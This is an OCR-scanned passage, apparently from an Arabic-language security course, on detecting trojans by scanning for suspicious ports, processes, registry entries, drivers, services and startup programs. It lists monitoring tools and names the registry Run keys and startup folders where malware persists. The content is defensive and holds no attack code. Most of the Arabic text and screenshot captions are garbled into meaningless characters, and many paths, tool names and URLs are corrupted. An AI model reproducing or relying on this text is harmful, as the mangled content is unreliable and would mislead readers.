42GG 


n>3aQJi1G-in-H. 1 e .. 


https 


ESTABLISHED 




flp freFoK.SHe 


3S7G 


TCP 


wiirmsselck4 k41 


4271 


maa03s16-in*f2l1 


Https 


ESTABUSHED 






3688 


TCP 


win ms$elck4 k4 1 


1155 


nim M25 le100.net 


5222 


ESTABLISHED 






















3GQ8 


TCP 


Win-nrisselck4 k41 


4282 


rftad03s10-in-F29 1 .. 


http 


SYN S E NT 


•I 


• * Isasi ewe 


1.4 1 


1 IP 


WIN MSSELCK4K 


in;'H 


W1N-M5SELCK4K, 


0 


LISTENING 




■ ' h*tt e?ne 
« ' tervices.ewe 




TCFVB 
TCP 


wirt-rns5itk:k4k41 
WIN M&SELCK4K 


102B 
1023 


^HjT|ftt5elck4k41 
WIH+lSSeLCK4IC.. 


0 
0 


LISTENING 
LISTENING 




t<1 






ill 




~n 









Endpoints: 69 



Estibhshtd: 22 Litttriin^: 26 



Time Wart: 1 



Close Wait 1 



CurrPorts Tool ^ 

A\ JL^ajVI (j^c-j <Lj .ialiftlt - ikluaj ^1 jjuJalllj ^l^kloaVI U3l^ ^ ^1 ia\_L<JI 4^jla o^a^>su t*U ^t-^uij CurrPorts 

^ Uj tLjajl iilall liA di^ia ^311 J CjU jlxJl jia iA^\\ ^fl iila J£3 .^Uajl! ^ U3U 4^ j^Jl UDPj TCP/IP 

cAjIaxJI ^Ludjj c^ill ciia jllj '(^tli 4L_aLJ! l_L^j t^tUxJI CjU» jls«-<» 4_kjoijj ;4_ilAxi3 <J>*1£3! jLuiaII tAjLftx]i ^jujI tilli 

TCP/UDP ^« ^ iai^ j <iaLi<Jl c^jfl ^jll CjUUxJI JjSj tl^ja j^JI TCP ^VU^i! (j^U t*U <li 

c^L j! .XML ^ 'HTML ^ 
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Top -1 

[#top] 3Ju^l 

Netstat -2 

Scanning for Suspicious Processes) ^ j^laII cjLlaxil ^ 



.cAjujjjjill ^ail^o ^x»I^>j cJ^ t *°'^^ clA^ ^ (> — ^ ^Uaill ^jL^.jjii3l pli^V ^ m ^ rootkit ( ; ^ ' ' I <s ^1 

_^Llai3l L^liA^j ^jj ^^jll ^cll 6 jj^jillj (Jlu o ^<J! daliLa 4 jjj^II <j!>Lk ^j-<i ^Uaill ^ cJ^-^ ^ worms j u^-jj^^ 6 ^ 

6^lj^)Ia ^jL^a^. L_flLujj£l j(g > >1 j 1 ij£ iqJ ;4_i1a3lII djlj^l iklLujl J ^ oVi^ ^ ^j^IaJ Ia^jjjIj \ & laJ ^-laJJ (j^Jj ''^^ ^(^5^ cJ^ J 1 ^ 

JjjL cjLojjj^I J ( fl«jjaH Jalij j^i ^Ijjlj ^Ijjla j^ 1 ^ ( .backdoorj 'worms 

Process Monitor 

http://technet.microsoft.com : j^-a^ll 
LUijj registry 'c5f^^ ^^^^ ls^ Jj^j J^-^i <-JajV ^ j slJ Process Monitor 

non-destructive j^j .U^ ^j^J^ ^jau^l ^Ijjj ^(j^i ^ji^ -ul^ki^l ^ .process/thread 

full thread ^ c3j^j^^ cjUUxJI jo cjUjIx^j ^ ^" . n^ t ^UjujIj session IDs ^ event 'richj 

" alA\ jialiull jllj cA-Aao (J^3 J^ki^i stacks 



Process Monitor - Sysinternals: www.systnternais.com 

Edit Event Filter Tools Options Help 



~T I 

UOCESS 



Tifme ... Process Mame PID 

lim ^BmlorerEXE 5572 

11:OS:„. ^Explorer, EXE 5572 

1109:... ^ Explorer. EXE 5572 

11 OS: ^jBrntorer EXE 5572 

11:09:-.. Iga&plorerEXE 5572 

11:03:... ^ExplorerEXE 5572 

11:03:_. ■J_csrss.exe 54S 

11:09:, - « csf^s.eoce 548 

11 :Q9: ... ■ r Q3T33 eace 54S 

11:09:... F 7 carss .cote 54 S 

11:09:... » ' csrss.exe 54S 

11;D9:.._ ■ ' csTBS.exe 54 & 



Ooeratlon Path 

^WCrearteRleMa. C:\Program Files ^c86>\^ozilla Rnefo... SUCXIESS 

rftRegOpenKey HKLM\Sc>ftware\Mol^o@crfl^Win^ SUCCESS 

R^Query Val ue H KLM SO FT 1 /-/ A R E\MrcrosoFt\Wm . NAM E NO 

^StRegaosetCey HKLMXSO FTWARE\Mcroscift\Wiri ... SUCCESS 

^WCrearte File C: Program Files £c&G)\Mozilla Rnefo... NAME NO 

^ Quei> r Basic Inf C Program Files £c£6)\fdozilla Rnefo. . SUCCESS 

^jk Read Pile C:\Windows\System 32 vaxssrv dll S UCC ESS 

i^Read File C:\Wfindows\Sy5tern 32\osrsrv dll SUCCESS 
fl£ RegQueryValue H KLMXSO FTW A R E\M*oroaoft\W( n S UCC E SS 

h3* Read File C:\Windows System 32cts dll SUCCESS 

Read Rle C:\W1ndow3\System 32 -sxs dll SUCCESS 

rftReaQuervKev HKLM SUCCESS 



[showing 359, 375 of &6i2,305 events j^A^y 


Backed by virtual memory 


1 
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What's Running *i 

http://www.whatsrunning.net : j^^il 
2000/XP/2003/Vista/Windows7 JS* o^l\ Jj^j ^ Jl <> * What's running 
. JUxioj^U Jajjaij (Jjniaj ^Jl ^driver < IP-connections^^ tCjU^kll j ;CjLUjJI 

^Lkll r Uall ^ IP cjVL^i! iilS jajj (IP connection) IP ^Vt^il - 

.4? ^Lkll ^Lkjll ^ ^l^kl^V! ^ ^1 exe:sj dll:s Jj^ c^U jk* .(module)^^ jll - 
jjiiaJ! <J^.I L_aLJI jlA^j ^iij <lj driver lS^*-^ 'drivers (j*~> l! <*-^ jI*-<JI <■ [(rfr/v^r)cJ^*-^^ 2r*^ 

.drive ^ ^ 

t^JU^JI j t4lA<J! d j^lill 4 (j-aUJI ^Ikill J j^. ^UjojUJI ^Ikill U« jlx^ '.{System information) ^Uaill cjU jlx* 



Hrip 



^lakfratxtot 

|J Load Snapsher from *e. 
^>LD*n>are snap with sa. . 
© Upload 5nap»x>r ki ... 



-'A 



Q £tOp Pf COM 

Select £r«r*a <o*jnBt* 
f^GcT tiro =nfcie 



•o9 



| Module* 



P\occ ; ± Waine 

wmbgQfi.ejie 
>; r vr" , "i: ■ . 
| eKptoier ease 

io/Kpers c«c 

R9 WptFLT ray <*so 
U F LComS^vCHI «*-:>?■ 

Snegftif eKB 

J§ PDWERPHT.M 
vrncorwiHct atw 
E T_n<jtfior bwh 



f chioffw.inei 




■:t: 

5G4 
BBS 
EDO 

335 

3140 
222J 

1396 

jse 

351? 
4120 

44^0 
4K04 
4200 

3404 

4708 

EZ3I 

2700 
5096 
3600 
3560 
2240 



Us*f Name 
SYSIEM 
SYSTEM 

j^nintslrattir 

Adimotrdtor 

Afyrw* jIt ato* 1 

ftcJTitrislra^or 

Adhnilralor 

AdunrcJralor 

AdVnmtr aj or 
AhLiHvtiT 31 Of 
ArJimslTajor 
• : :r ii. s i' ' 



343 f IP Connecfiiom - V \ *^ Crras ■ 273 1 Qr Si*iup-16| 

PTocet? kJgpriatkQn 

1^?^ dhrome.eKa 



S/ite« Wo | 



CPU Prod* 



0.0 
00 



00 

o.o 
ao 
oo 
oo 
oo 
oo 

oo 

f 

oo 
oo 

I 

00 

0.0 
00 

oo 

00 

oo 



T2 



Ar>nnftraljar 

Ajdiwwtrator 
ActTirprfraloT 
AjdiMffitrator 



O0 
OO 



oo 

00 



ZZL 



Rroc*ss Piopeflit-1 
Proceis 10 
FreeeM Name 
Paf*nt R-czet; ID 
CPU 
Target 

- f'tr^f-' 

- MiBmoiy 

Poge. FauP CouiH 
PeatWcfkinoS*!. 
Waking 5«l Size 
Ouoia Ph*; Page .. 
Quota Pa^ed Pod. 
Quoio Poa^Norv... 
Ouoia Nan Paged . 
Page F4o Usage 
PvaLPagsFlaU^.. 
* FileVof&ion 

i t™ 

Kmm\ Tima 

a i/o 

,4' Setvicw (0) 



Vata 

4« 

47CS 
00 



5090? 
45948 K 

3?SO0 K 

225 K 
25 K 
25 K 
323E4k 
3743B K 



&iaph 



CO CC 00 390 



IrpdKtBftttfrfh I S*<10nfJl 



Autorun *t 

http://technet.microsoft.com/en-US 

^jxi ^c>il^)i3l 4_j ^ajL till ^-!aJ ;^Uai3l l!^*-^ •^ c - ^^-^■^^ J -0 ^ Ai^>s«-<Jl 4_j^3 <^^J to^cLoixJl ol^Vl 

.Autorun.exe ^ £ ti^j^ c> ^ 

;aJU3I ^uai Autorun.exe 
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[WIN ^^TO^irNSWn-hr.r,.™] - Sy, 



hiekp 



AttOtUfK 

Pil* Entry Options Uiff 

HiS M i X 



Rug* Meagre T~ ♦ LSA PtovMlgis | £ N*tw*ork Pio^idef* | Sideb«* G,adge^ 

EvToiyflhno ^_±£ Logon E*piiorcP j Internet £ Jtplaroa [ ,J^1 Scheduled Tasks | ^» Scivncfs; ^ Dipv&ti 



Wintock Pr oy»rife« | 



AiJtoiufi Ertti^i De^4ici*ksrt Pufalish*r ^^^^^^ 

i!0M^KLMV5OFl^^E^Mpa NT \C«iwprv*rHon\Winlo^^ 

V _^ UMLogorLcnrid 
:#J^Kl^^£aFTWj^E>Mpaos^^ 

— ^ ■ - l-4a*Sl<eyisCjiiFcls hJuz-md Mockie Intel Coiptsatiori 

■ IgtieTi^ _ ■ " z. f"_J-..-f Irite. Caipowatson 

is£t BT^ Peisretemrce peissnrtencfii WoehJe Intel Corpoeation 

^MJ-*t^M^aFTW<^EV^ 

^d:be £J-sm - j-L-L-r - 3-*dei and Acpofr^rt... Adobe Sydems Incoiparafled ciSprotjiapT, Me* [«BGFyjcomfit.. 

V Adobe- Reader Adtibfi AuDberf SpssiLaun Adobe Systems I ncoipDraisd c:Sptagi£iiri f (KS*]\adzib 
ffi *>• EPSON_UD„S EPSOfBUSB Dbpl^ S^l 40 SEIKO EPSON CO FIFOFlA... e:SprDg.ain i*es t*aBJ\e*MrOL. 



I mag* Pafch 

c : \ do Vty dt am tE\ui^o . . . 



\ win do ws Vsy ct leni Mb . . 

S»\indows\siistefri32\j!jf>iii. . 



I- -if, 



.^Uaill (J^a^a till ^JJJ CjI jLlkJl ^jAslSI (J-g L£ J^*-^ CjIj^VI -^J^ (J I 

(j*tj ^Al) Pre View (Process Viewer) *k 
^Laaj tillijj tciL (j-aUJI jj j^^ll JW^ Jj xjuS j I I ^jS CjU^JI j\ jA\ ^ j^Jaj PrcView (Process Viewer) 

jSjjj tdjUi^Jlj ^j^- o^ljal <iajjaij 4_ajUj till .AliiaJI claLi^ ^j;^ ; ^ (j^aLkJ! jli jj;^^ ^ 



P 



f a ! 3 ^ a a .id i » Q] i a © ^ tfi -a 




JtVI 

^ ■■■^Jltf J Hhivn* * 

.■- P.=.n.«m F.l,i-,*fld*d«-. C<hH«h i«r- l^rt,Vi. . 

■ C-z^.am f ir-. Cc m -:n f.ln ^h»Jl,b 

Jt -V «n hln'J^ i^<A IJK« e • ±3 Z"i_ 



S J /SPja J3 .Zu-w r-JOSW- 1*37; 
3.-H.-JCH3 5:03 PM 



iKi^ih -jrHrf ¥«n«:"i 




.ps Sl^Vl j top StaVl W-^^ c>j j^Vl c> 1 > r-ijl U3 jSjj Jj*juSj1I ^Lkj ^3 
(Process Monitoring Tools) ^LL^\ i^J ^>Sft £*\j&\ 4- 

^Ulajl (J^^Jj J^^^^ ^ (^5-^-3 .CjLg jIslxJI Ua. jl j^il AjI^jII ^LnJl j ciL 4j^Lk]| <£jjaJl cJ-*^ 1 , ^ J ^J 6^ j CjI j^VI 
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Winsonar available at http://www.softpedia.com/get/Syste^ 
HiddenFinder available at http://download.cnet.com/HiddenFinder/3C 
KillProcess available at http://orangelampsoftware.com 
Security Task Manager available at http : //www . neuber . com 

Yet Another (remote) Process Monitor available at http://yaprocmon.sourceforge.net 
MONIT available at http://mmonit.com 
Process Monitor available at http://technet.microsoft.com 
OpManager available at http://www.manageengine.com 

(Scanning for Suspicious Registry Entries) ^ j^AaJI Registry ^Vl^jJ £p 

Emilia all Cjljjisull Ja^lj q\ aJ .registry t c^"^* ^Vl^j ^-^J ^ ^ t jlg^. ^^ic a^ljjla (jL^a^ C-UJJJ ^JJ LaAjc 

el)- 0 registry ^ ^— a u^l'^ Aili^JI djU^lcVl ^AxJI .^^^-laj r-n ^Uaill Cj\ j& <^ (j^aljcVI 

registry c> ^*LiI> cjhLijVI UjIHj isuj Jj^jll .sjIjjL (jc- L_Lj£Il ^Luj ^1 j jjjUI CjVU^VI ^h^Xa 

- Run 
RunServices 

- RunOnce 
RunServicesOnce 

- HKEY_CLASSES_ROOT\exefile\shell\open\command "% 1" % * 

^9 dal <uLlj]| ^^)^ u^j^>*^ .lA^j^)"^ ^^jojI ^jAslII ^jc ^ s ^jl ^j-d ^jjuLaII djVl^^^-i registry ^-a^a 

.AiniJl AiSaj^jl registry 



jvl6 PowerTools 2014 -Registry Cleaner 

http://ww.macecraft.com 
j^j registry *Ua*j ^ jj^ e^ 1 ^ ^^'j registry cleaner jvl6 PowerTools 2014 
*tai (jjmVi ^ ^-^t <-dl^klujl 4 .6^1 j^ia 4 u ^i^l <iajoj| jj lAjUij] c _^j3I registry ^Vl^^j (jc t ajuj^H ^ ^cLaajj registry 
ga^Jlj (jUiVl (jjoi^jj IVIRUj history Cy* <J^ 1 * a .^" ^ la^J) <L^)laj Aij^^xJI ciAiLJI ^ ^1 ^L^.jlail t jjALjll 



jvl 6 PowerTools 2014 



File Language X°°l s Help 



t MACECRAFT 
' SOFTWARE 



, Registry Tools 

r^H File Tools 

1*^*1 System Tools 

^fj Privacy Tools 



Backups 
i^^J Action History 
I | | | Settings 



Control which 
programs start 
automatically 



Statistics 



PC Health 



You have been using jv 16 PowerTools for 6 days and used it 13 times. During 
this time, you he\ s- £ xec 3733 -eg strv errors and dele tec 2 39 ;sip files, and 
1^1 other files. 



jvl6 PowerTools {3. l.O. 1321) running on Windows 8 Professio- •? - *i 3.9 GB of RAM 
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Registry Entry Monitoring Tool: PC Tools Registry 

http : //www . pctool s . com : j^-a^ll 

l^L^I j£\ aj> c^VU^registry ^ ^ registry cleaner PC Tools Registry Mechanic 

I 



0 PC Tools | Registry Mechanic 



PC Tools | Registry Mechanic 



+*rtTf jruMttjUuuTtHmttq nt r in* riTi-iiirH 'fii 




>*Pv z. nnihi uxmatr 



Iwih riri» iiirifM^nB mrrurr gramam 



h ttp./fwww.pctoofi. com 



Registry Entry Monitoring Tools 
CjI jjVi c> ^axJI cilU^i t pc Tools Registry Mechanicj jvl6 PowerTools 2014-Registry Cleaner J\ Ail^VW 
^ Lpa*j c ^Jj Uua j .dj^j <j] 66^1 j^ia (jl > ^>^> c-ujjj (jc c flj^£Jt ^cLaaj ^UJLj c Registry <j5Ij-<J till ^uujj ^jII 

: JU1I ^5!^ Registry c <jhn ^^^0^ j l^l^kiujl y-^lRegistry J^M j5l ^->tj^> 
Reg Organizer available at http : //www . chemtable . com 
Registry Shower available at http://www.registryshower.com 
Comodo Cloud Scanner available at http : //www . comodo . com 
Buster Sandbox Analyzer available at http://bsa.isoftware.nl 
All-Seeing Eyes available at http : //www . forte go . com 
MJ Registry Watcher available at http://www.jacobsm.com 
Active Registry Monitor available at http : //www . de vicelock. com 
Regshot available at http://regshot.sourceforge.net 
Registry Live Watch available at http://leelusoft.blogspot.in 



Scanning For Suspicious Device Drivers 



j| a i£ sj (jL^jjjl! (jli AiSlU Sjj^ dijaul ^^jI! j^U^aII t alia a ^» (device drivers) lS^*-^ 2^°^ iJj^* ^ U»Ajc 

i, jl^-aJI (Jjxjaij luaj djlj^l a I laJLujI J (j^lj AjlikV ^Uai£ *>i& o^lj^)Ia A L 1 a iklLujJ Cilia _^Uaill C5 ic CIujjj C5 ic <J jj^^JI 

Uui ^i^jll j 4Jfc jjjauJl cJ-j.Tr-t.Tu (j^a^a ( . la>J cillil ^L-Lai^ll ( . ilaal JjixjaLill ^Ia^LujI j lg-J ^jjj ^ jjc. j > ^> ^ 
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I Trojan Device 
Driver 




Trojans are installed along 
with device drivers 

downloaded from on trusted 
sources and use these drivers 
as a shield to avoid detection 



Scan for suspicious device 
drivers and verify if they are 
genuine and downloaded from 
the publisher's original site 



Goto Run Type msin£o32 -> Software Environment -fr System Drivers 



Attacker 



Device Drivers Monitoring Tool: Driver View 

http://www.nirsoft.net 

4_jaljjal dLa q^jc ^jj .t^L ^aLkll ^Uaill UIIa. l^liAaj ^^jll o^-^.VI (Jjxjujj ^c^I^j 4_L»l£ 4^jla (j^a^uDriverView sl^VI 
6^cj1a11 ^jujI 6 jIaj^VI L^a jll t^ixjaull ^c^U^j (Jj^vi ^jl <JiLa <Lajta3l ^ ^ (device driver)* lS^*-*^ ^^-^ cJ^ 

.HTML jtJ& ^4* j ^4? o- 3 ^ flkiSI 



Drive i 



F.i* Ed* Option* Help 



H :3 -0 Iff laj -Jl 
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* ATMFD DLL 
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SystEm CiivEf 


VHD Miniport Driver 
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9 tcpiprecj-sys 
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Ap plication 


TCP/IP Registry Comp^tibiEty D... 


& 2.3400.0 


Microsoft Corp... 


. . ..... . . 




9 sivnet.sys, 


OOOtOOQOI 5F4FOO0 
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Network Driva- 


Server Network driver 
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Microsoft Corp... 








O0CCO00C--1 5F94GO0 


0KOO3Cb4JO0 


1 


140 


System Diiuw 
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DriveT 
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np*->y> (NT 5/6 AMDW Kernel D.- 


4-1-0^001 
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DOOOOCflOT h 




» rj.PrDbrMcm bfb 
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1 
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le.o.ao 


Network Instru... 


DWXXW 1. 
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RXKXXW0 1., 




# KTTPjy* 


00000000131^000 
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1 
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Sytttm Cnv*r 


HTTP Protocol Stack 


6,1.9400.0 


Microsoft Corp .. 


000000D0 1 >■ 
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000000001 5E0D000 


OitOOOObOOO 
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System Crivir 




&.2.&400.0 
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O0O00O0O 1 ... 
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1 


J3 


System C»#vi*f 


Console Dnver 


6-2 8400.0 


Microsoft Corp .- 
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System Cri^-^r 
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* rnrxsrribZD.SY* 


ODQCWK'l jMSrWC 

■1 




113 


Svstem Cmer 


Microtoft: Core .,. 


WWAWW 1.. 

1 > 


l^hrmfrj 1 Sxlectvd 
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Device Drivers Monitoring Tools 



I^jVI^ D^lj^)Ia (jL^a^. (jC L_Lu£3l ^£ ^cLaaJ <^^J (J^*-^ '^ a J dll j^l '<ax 1 ^Jj Uu3 

Driver Detective available at http : //www . dri ver shq .com 
Unknown Device Identifier available at http : //www . zhangduo . com 
DriverGuide Toolkit available at http : //www . dri ver guidetoolkit . com 
DriverMax available at http : //www . innovative- sol . com 
Driver Magician available at http ://w w w . dri vermagician. com 
Driver Reviver available at http://www.reviversoft.com 
DriverS canner available at http : //www . uniblue . com 
Double Driver available at http : //w w w .boozet . or g 
My Drivers available at http : //www . zhangduo . com 
DriverEasy available at http : //www . dri vereas y . com 



Scanning For Suspicious Windows Services 



Cy* J^ * - ^ u^^W^ cJ^-^ l>* 6 {windows service) jj^j <*-^^ jjia q\ >^>^ ^uffi ^j^i 

.6^1 J^la jj\ >^*^ (jC L_Lu£3l cilj£ dJ 6 jjAlij djLd^k Aj^^)3I 



_4JLi±k CjI <uLlj ^jj^djj L_fl^Jl jtg_^JL Asu ^jc ^aall ^jj^^l g a\\ ^xujjj jjAlij djLd^k Lull} <^j3I 6^lj^)Ja 4_L^a^j 



^■Ui^j L_jc!^!il3 rootkit ^ jffi lJ^z* ji s^l jjla 3 u <^^\ m ^J^Sl\ <> . )W\ J^.) ^ ^jqjq^ Windows j j^f^ I^jLAac aj^joij 

.Wyi-c *Ui.V HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services (registry key) J*-JI 



Trojans spawn Windows services allow 
attackers remote control to the victim 
machine and pass malicious instructions 




r ■ 
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W fii ■ i ■ ■ —p 






DWM . 


•. ■ 1 1 






Hipp. 


tvyj . 




h '1*1 -ban T fl:»i*r.e p 1d*l 


WAjyimrn . tJ rmrd .. 


Ehip.. 






> Hp 1 F wdn i fmvr : 4**q « 






L. -v 




! Mtf'ilftTin 1 Fi 1 * C-Kt-i 5 bt 


PXwjrm.. <-»H . 




C\^.. 




«| h ■■: j« rC_l.T_.f " 


yiL_ T J«n ! l , 




1 ■■■■ 
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Hi-rpi , 
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Trojans rename their processes 
"■^ to look like a genuine Windows 

service in order to avoid 
l detection 



Trojans Employ root kit techniques to manipulate 
HK E V_LOCAL_MACHIU EVSystemVC u rrentControlSet 
\Services registry keys to hide it* processes 
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Windows Services Monitoring Tool: Windows Service Manager (SrvMan) 



http : //tools . s yspro gs . or g/sr vman : j^-a^ll 
jj a £ dj 11a . jj^jjj CjLd^k ^Jaii^ll <^UJI ^l^-ttll ^*aJ jL^aikl J-<ixj till ^ajujj ( ^j3I sbVI j& Windows Service Manager 
djLd^kj L_jc^dll j djUi^iJI 5-1x1] Uiajl ■ jj^j^ lS^*-^ sjIc] jl l_ fllijj ^jjAj Legacy drivers j Win32 J <alik^ CjUi^k 

ClAjLilaJ JjixjaLil aA^LujJ ^jl Uiajl cl£^ jVl J^>^ JJ J^^ ^Vim^l J (JJ* > ^ j (^^Jc- J^^ ^-g-^ .L£^>^^ ^l^C- VI 

.Windows c> ^ 64j ^ 32 c> l£ j* j .<u^ Win32 

I - O | X 



Service Manager 



File View Service Help 



Internal ran* 


SI Tr- 


r ■.-!■■!■■ 


Display name 


Start type 


Ek* curable 




■^iCOMSjwA... 


flopped 


Win32 


COM* System AppUqabon 


manual 


C\Whdoif^Ssysteiii32VdlhOi?i ewe /Pjoce-ssjd.- 




condrv 


iurning 


drivel 


Console Drivei 


manual 


: f-:ten\32 .drivers 1 ^ undrv .■: 






i- r mi 1.; 


shared 


QrjflplogEAphic Seivnces 


muMo 


Ci VW in da ay st»m3£\£ vcfi oil. exe -k Net^oi 




■^CSNSPD... 


slopped 


drivei 


CS M5PDT SB2 NDIS Protocol Oliver 


system 


Syslem32 VDriversACSN 5PD 1~S82. sys 




^>CS.N5PD... 


11 1 1 r 1 j 


drivei 


CS M5PDT S B2rt&4 NDIS Protocol Drivei 


system 


Syslem3aU>rivsr^CSW5PD tj*a 




^ CsNcfeLWF 


slopped 


drivei 


CsNtfcsLWF NDIS P^oiocol Drwer 


system 


Syslem32^Dnvers\C sN disLWF. sy s 




DcccnLau... 


lummg 


shared 


DOOM: Server Process Launcher 


auto 


C\Windoi^\sy£temi32\svciiDst.eKe -k Dcoml 




def 1 aasvc 


slopped 


Win32 


Qplirtttze drives 


manual 


G\Windo^Ssystern3£\avchDS«,eHe delraq. . 




9 DevrxAs... 


slopped 


-I i.-n^ii 


Dewce Association Service 


manual 


C VWnck»i^Ssyslern32\jsvchcisl.esQe -k LacaS... 




9 D ev»ceSns, . . 


flopped 


shared 


Device 1 nstai Service 


manual 


G\WindoYwSsysterrt32\svcftcsl.exe -k DcomL.. 






running 


Win32 


DFS Namespace 


auto 


CSWinido^Ssystem3£\dfssvc ana 






fuming 


FS driven 


DFS Namespace Client Driver 


system 


Syslem32VDnvers\.ci3C-. sys 




^3 DfsOfrvet 


tunning 


FS drivei 


DFS Namespace Serve* Flat Oliver 


system 


syst em3 2Sdt i ve r s \ dfs , sy s 






1 1 -n.ro 


Win32 


DFS Flephcarinri. 


auto 


C \W«doi^\syste4n32VDFSRs e*e 




SDfsrFto 

3 Dhcp 


•cunning 
iu> niriu 


FS drivej 
shared 


DFS Replication ReadOnly Drivei 
DHOP ClerU 


boot 
auo 


VSy s 1 emR oot^sy i* em 32 V dn vers \d 1 s rro . z 
C\WhdomSsys*enri32Vsvchoti I e?{e *■ Locals .. 




di.yz.oc he 


1 1 ■ r 1 1 0 


drivei 


System AttrbUre Cache 


system 


Syslem32 , wiiirvers\discache. sys 




^drsk 


funrting 


drivel 


Disk Diiver 


bond 


\Sy=terTTHQ^VSy5Jern32Vdrrvers\disk syi 




dmvst 


flopped 


drivei 


dm^sc 


manual 


VSytlerrTfloo^ys:tjerTi32\drK^sSd^sc-s^ 




tjf Dr.; cache 


i 1 n ng 


shared 


DNS Client 


auto 


CAWindowsSsystem3S\svcfiP4(.eKe -k Net^e* ... 




3 dptSsvc 


Pepped 


shared 


WaedAutoCorilfl 


manual 


C VWindoiTitS^tterriiSSVtvcliiosI ewe * LotalS 




9 D PS 


luming 


shared 


Diagnostic Policy Service 


auto 


C Windows\SystefTi32\svchost.e>!e -k Local.. 






Properties... 




| Staft^vre 




| Restart service 



Add service 



Em>i 



Other Windows Services Monitoring Tools 

i^Ull j^ll ^ JjjoJI ^ <Sj^j jflljjj Windows <^^1 jll 
Smart Utility available at http : //www . thewindow sclub . com 
Netwrix Service Monitor available at http ://www . netwrix . com 
Vista Services Optimizer available at http ://w w w . smartpcutilities . com 
ServiWin available at http://www.nirsoft.net 

Windows Service Manager Tray available at http://winservicemanager.codeplex.com 

AnVir Task Manager available at http : //www . an vir . com 

Process Hacker available at http://processhacker.sourceforge.net 

Free Windows Service Monitor Tool available at http://www.manageengine.com 

Overseer Network Monitor available at http ://www . over seer-network-monitor . com 

Total Network Monitor available at http : //www . sof tin venti ve . com 
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Scanning For Suspicious Startup Programs 

4Jfc jJjuLaII (J-iT-Jult pAj £cxat^)J (J^a^a ttillil .^Uailt pAj Ajc Ujlfllj l^ii Igili 6 jj jJJ^ti j^-^- ^^-Sc 1 (pjffi tS^t ^ u^i^l 

alt S^tj^Ia 4 L ^t <ilU& <jl£ tit La AjA^J aJ ;4JaJjau3t djt jiaaJt ^tita ,6^tj^)ia (jL^a. (jc t L1£A] tA^. ^jj^jJa 

Startup ^V* LK»ai ^ JjVt SjlaaJl 

C :\ProgramData\Microsof t\Windows\Start Menu\Programs\Startup 

C :\Users\ (User-Name) \AppData\Roaming\Microsof t\Windows\StartMenu\Programs\Startup 

(J-liiuult ^»Uaj (J.1t.uiJ f,Aj Ajc Lit (J-aJtlt t^JJ ^^jlt CjLdAiJt (J^a^S 

Go to Run, type services.msc, and click Sort by Startup Type 

.registry ^ J j» cjVIaj] <j-a^i 

.Lit J ^vil t Iajj ^1 (device driver) SjsVtfl J^-*^ o-^^ 

C :\Windows\System32\drivers 

Check boot.ini or bed (bootmgr) entries. 



Windows8 Startup Registry Entries 
I^VIS registry cjVUjI ^ IajUJ jj^j Jj» » n^t ftk> Jji ,^ aj)aj a^ Lit Jaxj ^jJI Cjllnkilt 



Explorer 

Startup 
Setting 



Windows 
Startup 
Setting 



IE 

Startup 
Setting 



hklm\ software \Mic r aeof t \ windows \cuizaiiLV&reion \ Expl oe s r > she 11 fqIcIges, co-tunon Etarr 

SKIiM \ SCITWAHE \Mic rosof t \ Windows \ Cur reatVer sio-n > £xpl ore e \ U e e e Shell Folders r Conunorj S t .a.:r - up 
HKCU\Sq ftwaie\Micioaoft\lffindowa\i?ur rsntVexs ion \ Eicpl die r \ Shsl 1 Fold&ra , Startup 
HKCU\ S o f twai© \Hic rosof t \ Windows \ Cur ientv^r sion.\ Expl or s r\ Ussr Shell Folders, Etarfufi 
hkcu\ so f twire \nic iosof t \ windows mt?\ currentversi o n \ wi nci. ova , load 



HKlit4\ SCFTWABE \wic rosoft \ Windows \ cur r&n tVsi b ion. \ Run 
HKCO\ So ftwir* \Mic rosoft \ Window* \ Cur r*n tV*i £ ion \ Run 
HKLM\ so FTWARE \Mi c rosof t\Windows \ Currentvers i on \ flunOnc e 
hkcu\ sof tware \Mic rosoft \ windows \ cur rent vers ion \ Runonc e 




hkcu \ So 1 cvar« \Mic rosoft Mnte met Expl ««\ Ur 1 Search Hoc- kc 
HFI^f \ SOFTWARE \Mi c rose ft \ Int» rn«t Expl o r • r \ Tool ba r 
HKIiM\SOFTWARE\Microsof tMnt&rnet EKplor*r \ Extensions 
HKCU \ SOFTWARE \Mic rosoft \ I r,t e met Explorer \ MsnuExt 




Programs that run or Windows startup car be located in these registry entries 



Startup Programs Monitoring Tool: Starter 
registry £jVI^I ^tAxlj ^JL . JjxjuHH ^Uaj Jj^vi LaAk. Ujlili Iajj c ^2lt ^t^Jt Sjtajj <jia^>xj till ^joij Starter 

.Ujl^j ' * W jt 6£>A}A^. ^Ludjjj 

DLL t**^* l!^ cijULixJI ijp. <xjoj j>» CjLq jlx-d (jiajc ^ j£ view C5-^ jjj^'^t <jjL^Jt CjULqjJI ^jjuj l^ajt ^ i£ sj Starter 
'NT 'ME 6 x9 jj^j ^ j^jj^^ a ivw^\t 4_iLix]t pl^jjj t^lt tdjbjljVlj 'threats t^jSlill ^t iki^t ^^kiuwJt 
Jji^t ^ ^ registry operations ^ j t^ U aI^J^ cjUlki. a^jj V .liyui j '2003 'XP '2000 

.4^aLk Jj^aj (Jji^ L-lUaJJ ^tj-WindOWS NT S Vnm^ t 
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SKMtrt (Server J 



- Jl St^tup takfan (I) 
Aa AD uteri ill 

~ A r*9«»* nn 
m R*m« 

J» ftgnOntt »: I j 
ft_ aji nun O OJ 

* Run ?. 

0 fcgnOrvcc 

Ji RunQrwrf... 

0 RunS*fVKIt 

0 RunS*rntt^. 

« *un 

» ■ *■ 

1 



f*t Drlrtr 



a ■ 

0 - 

B 
B 

BA 

mm 

BO 

BS^ 
B 

0- 
H 

□y 

B 

0i 



APC 

Dn-,*i D*t*cTTv* 

dtrir«xe 

EkomSofl DPR 5 
IMI7 Net*** 

gpogtottl 

*nMVmijii 

mint 

IC.fr* 
svcndti! 
Trt*. 



C .Pnsgf#*n i,*15Kf kmnsfl#l P«s*wS RKO*#fy._ 
C ..Pwgc*m fU«* u*ft\f MTTtM* T_nc**M» 
C:\Pt*gwn F*h C-ttjMRSOnl P ^ tct rt ^SON U5_ 
C ".Piwgr*™ f lies (■4^'JNit*'Sc^'*'»r* i PcWc Lc<h F- 
C \Pwfr#m Fife (■S6)\Goog«c' Go<hgf« 1a*\qooqhK,- 

'OvIPtO^Mm In*** (i*6J , '.WW»**p* Lrv* M*4i*<Hj*f m 
UnHKfcJvb RHtti Owcfc 



R*qra»y 
R#9«try 
Rc^ln, 



Mbcrwrw Run 

- Uur Run 

- M«<ll*rM Run 

- P,ti<hm* Run 

